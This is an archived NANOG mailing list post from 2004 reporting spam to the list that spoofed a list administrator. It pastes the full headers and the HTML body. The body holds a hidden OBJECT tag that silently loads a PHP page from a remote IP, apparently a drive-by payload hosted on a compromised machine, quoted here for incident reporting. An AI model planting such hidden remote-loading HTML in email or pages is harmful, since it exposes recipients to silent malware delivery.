North American Network Operators Group Date Prev | Date Next | Date Index | Thread Index | Author Index | Historical now what - spam to nanog spoofing susan harris?
Mailed out through an open proxy / hacked machine in some australian museum, with a body that tries to load this html page - http://24.84.218.164:81/641280.php Page is hosted on a shawcable conection (probably another trojaned box) that I can't seem to access, though the host is barely pingable srs Return-Path: <[email protected]> Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) by corpmail.outblaze.com (Postfix) with ESMTP id B199316DD9F; Thu, 18 Mar 2004 02:43:17 +0000 (GMT) Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST) Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for <[email protected]>; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST) Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for <[email protected]>; Wed, 17 Mar 2004 21:40:43 -0500 (EST) Delivered-To: [email protected] Delivered-To: [email protected] Delivered-To: [email protected] Date: Thu, 18 Mar 2004 13:40:35 +1000 To: [email protected] Subject: Request response From: [email protected] Message-ID: <[email protected]> MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: [email protected] Precedence: bulk Errors-To: [email protected] X-Loop: nanog X-AntiVirus: checked by Vexira MailArmor (version: 2.0.1.11; VAE: 6.24.0.7; VDF: 6.24.0.61; host: corpmail.outblaze.com) <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://24.84.218.164:81/641280.php"> </OBJECT></body></html>
|